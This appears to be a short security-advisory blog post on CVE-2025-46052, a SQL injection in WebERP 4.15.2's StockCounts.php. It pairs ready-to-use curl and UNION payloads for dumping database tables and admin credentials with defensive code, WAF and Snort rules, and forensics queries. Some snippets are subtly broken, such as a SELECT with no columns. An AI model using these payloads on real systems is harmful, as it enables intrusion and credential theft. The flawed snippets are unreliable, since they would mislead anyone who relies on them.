WebERP, SQL Injection, CVE-2025-46052 (Critical)

Listen to this Post

How CVE-2025-46052 Works

This vulnerability exists in WebERP v4.15.2 due to improper input sanitization in the `StockCounts.php` script. Attackers can exploit the `DEL` parameter in a POST request to inject malicious SQL queries. The application fails to validate user-supplied input, allowing error-based SQL injection. When a crafted payload is submitted, the database returns verbose error messages, enabling attackers to extract sensitive data such as user credentials, financial records, and system configurations. The exploit leverages UNION-based techniques to bypass authentication and execute arbitrary SQL commands.

DailyCVE Form

Platform: WebERP
Version: 4.15.2
Vulnerability: SQL Injection
Severity: Critical
Date: 06/12/2025

Prediction: Patch expected by 07/20/2025

What Undercode Say:

Exploitation

1. Craft malicious POST request:

curl -X POST "http://target.com/StockCounts.php" -d "DEL=1' UNION SELECT 1,2,3,user(),5-- -"

2. Extract database info:

1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- -

3. Dump admin credentials:

1' UNION SELECT 1,username,password,4 FROM users-- -

Protection

1. Input Sanitization:

$del = mysqli_real_escape_string($conn, $_POST['DEL']);

2. Prepared Statements:

$stmt = $conn->prepare("DELETE FROM stock WHERE id = ?");
$stmt->bind_param("i", $_POST['DEL']);

3. WAF Rules:

location /StockCounts.php {
modsecurity_rules 'SecRule ARGS:DEL "@detectSQLi" deny,status:403';
}

Detection

1. Log Analysis:

grep 'POST /StockCounts.php' /var/log/apache2/access.log | grep -E "UNION|SELECT|--"

2. IDS Rule (Snort):

alert tcp any any -> $HOME_NET 80 (msg:"WebERP SQLi Attempt"; content:"POST /StockCounts.php"; pcre:"/DEL=[^&][\'\"].(UNION|SELECT|--)/i"; sid:100046052;)

Mitigation

1. Patch Verification:

diff StockCounts.php StockCounts.php.patched | grep mysqli_real_escape_string

2. Database Hardening:

REVOKE DELETE ON stock FROM 'weberp_user'@'localhost';

3. Error Suppression:

ini_set('display_errors', 0);

Post-Exploit Forensics

1. Check Database Logs:

SELECT FROM mysql.general_log WHERE argument LIKE '%UNION%';

2. Audit User Sessions:

cat /var/log/weberp/auth.log | grep "admin"

No further commentary.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top